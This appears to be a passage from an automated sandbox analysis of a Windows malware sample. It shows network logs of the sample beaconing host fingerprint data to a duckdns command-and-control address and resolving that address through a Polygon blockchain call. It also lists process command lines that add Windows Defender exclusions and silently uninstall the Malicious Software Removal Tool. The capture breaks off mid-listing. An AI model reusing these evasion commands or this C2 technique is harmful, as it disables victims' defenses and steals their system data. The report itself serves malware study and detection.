Jan 12, 2025 17:38:42.738411903 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:42.738526106 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:38:43.109447002 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:42 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:38:46.301794052 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:46.301820040 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:38:46.674504042 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:46 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:38:49.646140099 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:49.646140099 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:38:50.017112970 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:49 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:38:53.017200947 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:53.017251015 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:38:53.231898069 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:53 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:38:54.954823971 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 235 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:54.955024958 CET	235	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"No Title"}
Jan 12, 2025 17:38:55.326200008 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:55 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:38:56.989052057 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:56.989339113 CET	270	OUT	Data Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \|
Jan 12, 2025 17:38:57.356446028 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:57 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:38:59.352034092 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:38:59.567553043 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:01.303641081 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:01.675405979 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:01 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:04.713134050 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:05.082638025 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:06.945420980 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:07.318682909 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:09.196762085 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:09.565880060 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:10.702435970 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:10.702502966 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:11.983525038 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:12.354258060 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:15.086321115 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:15.336731911 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:18.202239990 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 235 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:18.575197935 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:21.229813099 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:21.601856947 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:24.564680099 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:24.934196949 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:27.656596899 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:28.025451899 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:27 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:30.870609045 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:31.242050886 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:30 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:34.035517931 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:34.408330917 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:34 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:37.069493055 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:37.441191912 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:37 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=77 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:39.883645058 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:40.168404102 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:40 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=76 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:42.467192888 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:42.681922913 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:42 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:45.304141045 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:45.673830032 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:45 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=74 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:48.381927013 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 235 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:48.602425098 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:48 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=73 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:51.222837925 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:51.594625950 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:51 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=72 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:54.243062973 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:54.613835096 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:54 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=71 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:39:57.271044970 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:39:57.642462015 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:39:57 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=70 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:40:00.363336086 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:40:00.586632967 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:40:00 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=69 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:40:03.191436052 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:40:03.563396931 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:40:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=68 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:40:06.121020079 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:40:06.489887953 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:40:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=67 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:40:09.435264111 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:40:09.826176882 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:40:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=66 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:40:12.363176107 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 235 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:40:12.586406946 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:40:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=65 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8
Jan 12, 2025 17:40:15.413937092 CET	208	OUT	POST /api/point.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/json User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml Content-Length: 270 Host: blockchainlegion.duckdns.org
Jan 12, 2025 17:40:15.786204100 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:40:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=64 Connection: Keep-Alive Content-Type: text/plain;charset=UTF-8

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	173.244.207.29	443	7720	C:\Windows\System32\conhost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 16:38:28 UTC	120	OUT	POST / HTTP/1.1 Connection: Keep-Alive User-Agent: WinHTTP Example/1.0 Content-Length: 136 Host: polygon-rpc.com
2025-01-12 16:38:28 UTC	136	OUT	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 37 35 63 44 32 35 37 39 31 41 36 30 61 62 33 34 35 31 45 32 64 32 66 65 42 35 65 63 34 36 63 36 66 35 34 31 43 32 42 38 22 2c 22 64 61 74 61 22 3a 22 30 78 62 36 38 64 31 38 30 39 22 7d 2c 22 6c 61 74 65 73 74 22 5d 2c 22 69 64 22 3a 31 7d Data Ascii: {"jsonrpc":"2.0","method":"eth_call","params":[{"to":"0x75cD25791A60ab3451E2d2feB5ec46c6f541C2B8","data":"0xb68d1809"},"latest"],"id":1}
2025-01-12 16:38:28 UTC	520	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 16:38:28 GMT Content-Type: application/json Content-Length: 294 Connection: close Strict-Transport-Security: max-age=15724800; includeSubDomains Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, PUT, POST, DELETE, PATCH, OPTIONS Access-Control-Allow-Headers: DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization,solana-client Access-Control-Max-Age: 1728000
2025-01-12 16:38:28 UTC	294	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 31 36 38 37 34 37 34 37 30 33 61 32 66 32 66 36 32 36 63 36 66 36 33 36 62 36 33 36 38 36 31 36 39 36 65 36 63 36 35 36 37 36 39 36 66 36 65 32 65 36 34 37 35 36 33 36 62 36 34 36 65 37 33 32 65 36 66 37 32 36 37 32 66 36 31 37 30 36 39 32 66 37 30 36 66 36 39 36 65 37 34 32 Data Ascii: {"id":1,"jsonrpc":"2.0","result":"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000031687474703a2f2f626c6f636b636861696e6c6567696f6e2e6475636b646e732e6f72672f6170692f706f696e742

Target ID:	0
Start time:	11:38:12
Start date:	12/01/2025
Path:	C:\Users\user\Desktop\sE5IdDeTp2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sE5IdDeTp2.exe"
Imagebase:	0x7ff6099b0000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:38:13
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:38:13
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff702490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:38:22
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff765a80000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
